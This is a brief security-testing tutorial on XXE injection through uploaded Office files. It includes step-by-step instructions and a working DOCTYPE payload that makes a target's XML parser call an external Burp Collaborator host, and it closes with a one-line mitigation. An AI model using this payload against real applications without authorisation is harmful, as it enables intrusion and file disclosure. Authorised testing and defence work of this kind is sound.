The vulnerability of XML External Entity (XXE) is that when parsing an XML document structure called Document Type Definition (DTD), you are allowed to define your own XML entities. Depending on the server-side XML processing engine and the configuration of the environment, this type of vulnerability can be exploited differently. Starting with listing directories on the system, reading application and system files, obtaining an encrypted password of the application user, as well as transferring files to the server or executing system commands.
The classic scenario of this type of vulnerability assumes that we are dealing with a request containing in our body xml to which we add the part responsible, for the definitions of our own entity. This vulnerability, however, can also occur when dealing with an application that somehow processes Excel files. XLSX , Word . DOCX or PowerPoint . PPTX. We owe it to the fact that these types of files that are OOXML-compliant, thus they are simply packed several files. XML.
The quick attack scenario is as follows:
- Create a new blank document . XLSX. It can use the “Google Sheet” for this purpose.
2. Open Burp Suite Professional -> Burp -> Burp Collaborator Client . Then click the “Copy to clipboard” button. In my case, the server address was as follows – lpexqn6l2qamcw74mgerllgpzg56tv.burpcollaborator.net.
Alternatively, if you have an external IP, you can use a simple HTTP server in python – “python3 -m http.server 8080”.
3. Open the downloaded file with 7zip.
3. Edit the “workbook.xml” file in the “xl” directory by adding the following code (of course, replacing the server address with your own):
<!DOCTYPE root [ <!ENTITY % xxe SYSTEM "http://lpexqn6l2qamcw74mgerllgpzg56tv.burpcollaborator.net/"> %xxe; ]>
NOTE- In one of the applications I tested, the vulnerability xxe revealed after editing “[Content_Types].xml”, so it’s worth checking this file.
4. Save your changes and upload the file in the app you’re testing.
5. Now check the Collaborator client for any requests:
6. Enjoy the 🙂 – you have just confirmed xxe vulnerability in the tested application and you can proceed to further its use.
A common security feature against XXE is to completely disable the loading of external entities in an XML parser.